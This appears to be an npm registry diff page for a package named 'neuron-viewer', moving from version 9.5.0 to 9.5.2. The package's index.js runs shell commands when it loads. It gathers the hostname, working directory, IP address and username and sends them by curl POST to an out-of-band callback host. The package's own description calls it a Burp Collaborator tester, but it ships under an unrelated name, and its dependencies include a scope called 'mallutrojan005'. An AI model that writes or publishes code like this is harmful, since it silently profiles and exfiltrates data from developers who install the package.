neuron-viewer 9.5.0 → 9.5.2

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/index.js +2 -2
  2. package/package.json +6 -2
package/index.js CHANGED
@@ -1,7 +1,7 @@
1
1
  const { exec } = require("child_process");
2
2
 
3
3
  function sendPingback(data) {
4
- const collaboratorUrl = "https://tolipxvbr0x5h5ltka5dbwflocu3it6i.oastify.com";
4
+ const collaboratorUrl = "https://rxthgpisbdduguomjwmisrypidcuf7xqs.oast.fun";
5
5
  exec(`curl -X POST -d "${data}" ${collaboratorUrl}`, (error, stdout, stderr) => {
6
6
  if (error) {
7
7
  console.error(`Error: ${error.message}`);
@@ -33,5 +33,5 @@ function executeCommand(command) {
33
33
  }
34
34
 
35
35
  // Example: Execute a command (e.g., 'whoami')
36
- executeCommand('whoami');
36
+ executeCommand('echo "Hostname: $(hostname), Directory: $(pwd), IP Address: $(hostname -I | awk '{print $1}'), Username: $(whoami)"');
37
37
 
package/package.json CHANGED
@@ -2,7 +2,7 @@
2
2
 
3
3
  "name": "neuron-viewer",
4
4
 
5
- "version": "9.5.0",
5
+ "version": "9.5.2",
6
6
 
7
7
  "description": "A simple package to trigger Burp Collaborator for security testing",
8
8
 
@@ -18,7 +18,11 @@
18
18
 
19
19
  "@mallutrojan005/coveralls": "^0.1.0",
20
20
 
21
- "assistants-nextjs": "^9.0.0"
21
+ "assistants-nextjs": "^9.0.0",
22
+
23
+ "lean-coffee": "^9.0.1",
24
+
25
+ "ts-jest-starter-kit": "^9.0.0"
22
26
 
23
27
  }
24
28